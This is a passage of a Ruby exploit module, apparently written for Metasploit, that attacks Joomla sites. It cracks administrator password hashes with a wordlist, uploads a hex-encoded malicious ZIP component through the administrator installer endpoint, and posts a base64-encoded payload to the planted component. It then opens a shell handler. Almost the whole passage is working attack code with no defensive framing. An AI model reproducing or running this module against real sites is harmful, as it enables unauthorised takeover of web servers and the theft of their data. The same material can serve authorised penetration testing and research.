wrap << "\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D"
|
|
wrap << "\x38\x22\x3F\x3E\x0D\x0A\x3C\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E"
|
|
wrap << "\x20\x74\x79\x70\x65\x3D\x22\x63\x6F\x6D\x70\x6F\x6E\x65\x6E\x74"
|
|
wrap << "\x22\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x36\x2E\x30"
|
|
wrap << "\x22\x3E\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x6E\x61"
|
|
wrap << "\x6D\x65\x3E\x4A\x6F\x6F\x6D\x6C\x61\x3C\x2F\x6E\x61\x6D\x65\x3E"
|
|
wrap << "\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x66\x69\x6C\x65\x73"
|
|
wrap << "\x20\x66\x6F\x6C\x64\x65\x72\x3D\x22\x73\x69\x74\x65\x22\x3E\x3C"
|
|
wrap << "\x66\x69\x6C\x65\x6E\x61\x6D\x65\x3E\x6A\x6F\x6F\x6D\x6C\x61\x2E"
|
|
wrap << "\x70\x68\x70\x3C\x2F\x66\x69\x6C\x65\x6E\x61\x6D\x65\x3E\x3C\x2F"
|
|
wrap << "\x66\x69\x6C\x65\x73\x3E\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20"
|
|
wrap << "\x20\x3C\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x69\x6F\x6E"
|
|
wrap << "\x3E\x3C\x6D\x65\x6E\x75\x3E\x4A\x6F\x6F\x6D\x6C\x61\x3C\x2F\x6D"
|
|
wrap << "\x65\x6E\x75\x3E\x3C\x2F\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61"
|
|
wrap << "\x74\x69\x6F\x6E\x3E\x0D\x0A\x3C\x2F\x65\x78\x74\x65\x6E\x73\x69"
|
|
wrap << "\x6F\x6E\x3E\x0D\x0A\x50\x4B\x01\x02\x14\x00\x0A\x00\x00\x00\x00"
|
|
wrap << "\x00\x65\xB3\x9A\x3E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
|
wrap << "\x00\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00"
|
|
wrap << "\x00\x00\x00\x63\x6F\x6D\x5F\x6A\x6F\x6F\x6D\x6C\x61\x2F\x50\x4B"
|
|
wrap << "\x01\x02\x14\x00\x0A\x00\x00\x00\x00\x00\x35\xB2\x9A\x3E\x53\x03"
|
|
wrap << "\xF2\xF9\xAF\x00\x00\x00\xAF\x00\x00\x00\x15\x00\x00\x00\x00\x00"
|
|
wrap << "\x00\x00\x00\x00\x20\x00\x00\x00\x29\x00\x00\x00\x63\x6F\x6D\x5F"
|
|
wrap << "\x6A\x6F\x6F\x6D\x6C\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61\x2E\x70\x68"
|
|
wrap << "\x70\x50\x4B\x01\x02\x14\x00\x0A\x00\x00\x00\x00\x00\x91\xB6\x9A"
|
|
wrap << "\x3E\x8D\x4A\x99\xA9\x07\x01\x00\x00\x07\x01\x00\x00\x15\x00\x00"
|
|
wrap << "\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x0B\x01\x00\x00\x63"
|
|
wrap << "\x6F\x6D\x5F\x6A\x6F\x6F\x6D\x6C\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61"
|
|
wrap << "\x2E\x78\x6D\x6C\x50\x4B\x05\x06\x00\x00\x00\x00\x03\x00\x03\x00"
|
|
wrap << "\xBF\x00\x00\x00\x45\x02\x00\x00\x00\x00"
|
|
|
|
# Verbose
|
|
print_status("Attempting to upload payload wrapper component")
|
|
|
|
# Post data
|
|
data = {
|
|
|
|
# Component data
|
|
'install_package' =>
|
|
{
|
|
'filename' => czip,
|
|
'contents' => wrap,
|
|
'mimetype' => 'application/zip',
|
|
'encoding' => 'binary',
|
|
},
|
|
|
|
# Required install params
|
|
"installtype" => "upload",
|
|
"task" => "install.install",
|
|
"#{rtok}" => "1",
|
|
}
|
|
|
|
# Upload the wrapper component
|
|
init_debug(http_post_multipart("administrator/index.php?option=\
|
|
com_installer&view=install", data, hdrs))
|
|
|
|
# Deliver the selected payload to the target
|
|
init_debug(http_post(curi, Rex::Text.encode_base64(load)))
|
|
|
|
# Shell
|
|
handler
|
|
return
|
|
else
|
|
|
|
# Verbose
|
|
print_error("Failed to crack hash. Searching for new admin account ...")
|
|
end # if
|
|
snum += 1
|
|
end # while
|
|
|
|
# Verbose
|
|
print_error("Unable to crack any admin hashes. Try a better wordlist?")
|
|
return
|
|
end
|
|
end |